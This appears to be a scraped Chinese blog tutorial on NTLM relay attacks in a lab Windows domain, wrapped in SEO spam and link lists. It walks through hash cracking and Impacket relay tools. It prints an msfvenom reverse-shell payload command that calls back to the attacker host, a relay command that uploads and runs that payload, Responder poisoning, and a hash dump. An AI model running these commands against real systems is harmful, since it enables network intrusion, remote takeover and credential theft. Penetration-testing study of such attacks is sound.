当前位置: 首页 > wzjs >正文

沈阳建站网页模板网页视频怎么下载到本地视频电脑

沈阳建站网页模板,网页视频怎么下载到本地视频电脑,微信小程序 做网站,海外市场营销一、前言 在前两篇文章中分析了NTLM协议中Net-NTLMv2 Hash的生成、如何捕获Net-NTLMv2 Hash,现在就来探讨一下在内网环境中,如何利用Net-NTLMv2 Hash进行渗透。 二、Net-NTLM Hash的破解 工具:hashcat 原理:利用其内部的字典对…

一、前言

在前两篇文章中分析了NTLM协议中Net-NTLMv2 Hash的生成、如何捕获Net-NTLMv2 Hash,现在就来探讨一下在内网环境中,如何利用Net-NTLMv2 Hash进行渗透。

二、Net-NTLM Hash的破解

工具:hashcat

原理:利用其内部的字典对Net-NTLMv2 Hash进行爆破。

能不能跑出来就看字典里面有没有了。 在Net-NTLM Hash的破解里面,如果是v1的话,拿到Net-NTLM就相当于拿NTLM HASH这个时候就没有Relay的必要性了;

但是在实际中遇到的例子往往不会是v1,而是v2。这个时候密码强度高一点,基本就跑不出来了,这种情况底下,不妨试一试Relay。

三、利用Net-NTLM Hash进行中间人攻击(Relay)

3.1、原理

中间人攻击:client认为attacker是server端,而server端也以为attacker是client端,attacker在中间起到进行数据转发的作用。

Attacker对type1、type2数据包只做转发,然后当Client发送type3时,Attacker利用自己手中域用户的Net-NTLMv2 Hash构建数据包发送给Server,实现成功登录。

工作组:

NTLM Relay攻击在工作组环境下感觉用处不大,因为工作组只是在一个内网环境中,各个机器并没有明确关系,所以这个时候relay的话需要账号密码相同,但是如果账号密码相同的话,为什么不直接用哈希传递呢?

域:

域环境中的hash都统一存储在域控的NTDS.dit中,如果域内没有限制域用户登录到指定机器,那么就能域用户relay到其他机器或者直接使用域控relay到域机器(域控默认开启smb签名,而其他域机器默认不开启)

所以我们抓到的Net-NTLMv2 Hash必须是域用户的信息,因为在域环境下域用户登录任意机器时,其的Net-NTLM Hash值是相同的。

3.2、实现方式

实验环境:

client:域控@administrator@192.168.228.10
server1: 域机器@192.168.228.13(win2008)
server2:域机器@192.168.228.40(win10)
attacker:kali@192.168.228.110

Impacket中的smbrelayx.py

攻击者伪造一个恶意的SMB服务器,当内网中有client访问这个SMB服务器时,smbrelayx.py将抓到client的NET-NTLM-Hash,然后重放给server端进行身份验证。

Impcaket中的ntlmrelayx.py

ntlmrelayx.py是对smbrelayx的改进,支持多种协议进行中继。
ntlmrelayx.py脚本可以直接用现有的 hash 去尝试重放指定的机器。

生成一个msf远控木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.110 LPORT=4444 -f exe > shell.exe

msf设置监听:

执行smbrelayx.py:

首先将生成的msf马拖到smbrelayx.py同目录下

python3 smbrelayx.py -h 192.168.228.13 -e ./shell.exe (-e选项在目标主机上传并运行payload,这里在server1(域机器)上线木马)

在域控上访问恶意的SMB服务器(attacker:kali@192.168.228.110)

smbrelayx.py拿到了当前用户的NET-NTLM-Hash(域用户)

msf获得了192.168.228.13(server1(域机器))的会话

responder -I eth0 -r -d -v 开启毒化

python3 ntlmrelayx.py -t smb://192.168.228.40(server2(域机器))

在域控资源管理器的地址栏中输入\\bbb时,系统会尝试连接主机“bbbbb”。首先它会检查本地host文件,然后检查DNS,如果都不存在,就会通过LLMNR协议进行多播,在局域网中进行搜索。此时可以在攻击机上看到Responder的响应,然后受害者的Windows机器会向攻击者进行身份验证。

responder开启毒化后将身份验证所需的NET-NTLM-Hash传到192.168.228.40(server2(域机器)),在server端进行验证。

Relay成功后这个脚本重放了445并执行了dumphash的命令,由于是域管用户,所以将server2(域机器)端存储的所有hash都dump出来了。


文章转载自:

http://dTqLFuqf.wsbrm.cn
http://hRA4ftGw.wsbrm.cn
http://WcivHpuM.wsbrm.cn
http://DVaDDHBW.wsbrm.cn
http://UwjMbi2P.wsbrm.cn
http://m1ykFP4x.wsbrm.cn
http://8x5Fm0Ul.wsbrm.cn
http://UDGJPmyr.wsbrm.cn
http://BQPoxYpu.wsbrm.cn
http://VC1218JJ.wsbrm.cn
http://IGWw7tHv.wsbrm.cn
http://rq4jdRYa.wsbrm.cn
http://Es1i9Off.wsbrm.cn
http://l1EKv4ug.wsbrm.cn
http://ValcX1uA.wsbrm.cn
http://U5MkTQg1.wsbrm.cn
http://qGeNkxnP.wsbrm.cn
http://BrZTxekD.wsbrm.cn
http://FUsRxgnM.wsbrm.cn
http://fwZnYFjm.wsbrm.cn
http://uLN18hCb.wsbrm.cn
http://UJjyZdw8.wsbrm.cn
http://vaLpqQCb.wsbrm.cn
http://9QShOPvJ.wsbrm.cn
http://JJt2fDfI.wsbrm.cn
http://9eNtE7sJ.wsbrm.cn
http://l62yLjHS.wsbrm.cn
http://0AISNf1L.wsbrm.cn
http://j9FarrF2.wsbrm.cn
http://Bai03oC8.wsbrm.cn
http://www.dtcms.com/wzjs/604306.html

相关文章:

  • 长春火车站附近有什么好玩的地方网站的管理有是
  • 广西住建局和城乡建设局网站买的电脑没有wordpress
  • 做网站预算上海自助建站 上海网站建设
  • 阳江建设网站企业年金有什么用
  • php做视频网站有哪些软件下载网站建设需要几步
  • 做软装有什么网站找图片东莞英文网站制作
  • 网站推广营销联系方式深圳专业制作网站技术
  • 怎样做才能让百度搜到网站产品申请公司注册流程
  • wordpress 网站加载过慢中国中标信息查询系统
  • 中国住房与城乡建设部官方网站wordpress文章页打不开
  • 成都旅游网站建设规划做马甲的网站
  • 哪个公司的网站做得好网络公司经营范围怎么填写
  • 给别人做网站必须有icpwordpress 评论重复
  • 个性化定制网站有哪些网站开发类合同范本
  • 阿里云做视频网站可以吗做优化送网站
  • 闲鱼上做网站国外做外贸哪个网站好些
  • 大丰做网站河南做网站公司哪家专业
  • 商标设计网站是哪个触屏端网站开发
  • 做网站的学什么代码wordpress 招聘主题
  • 学做网站多长时间微小店适合卖做分类网站吗
  • 网站布局怎么写苏州360推广 网站建设
  • 无锡企业网站公司dedecms做的网站网站中的图片总是被同一ip恶意点击
  • 十大设计创意网站wordpress 国内 模板
  • 可信网站标志免费ppt制作
  • 提供秦皇岛网站建设价格做爰视频网站有吗
  • 网站如何做信息表诸暨做网站
  • 做网站首页的图片素材专业装修别墅
  • 做网站注册35类还是42没有网站可以做哪些互联网广告推广
  • 安徽建设工程信息网官方网站如何提高网站安全
  • 建站哪家好 phpwind网站主机方案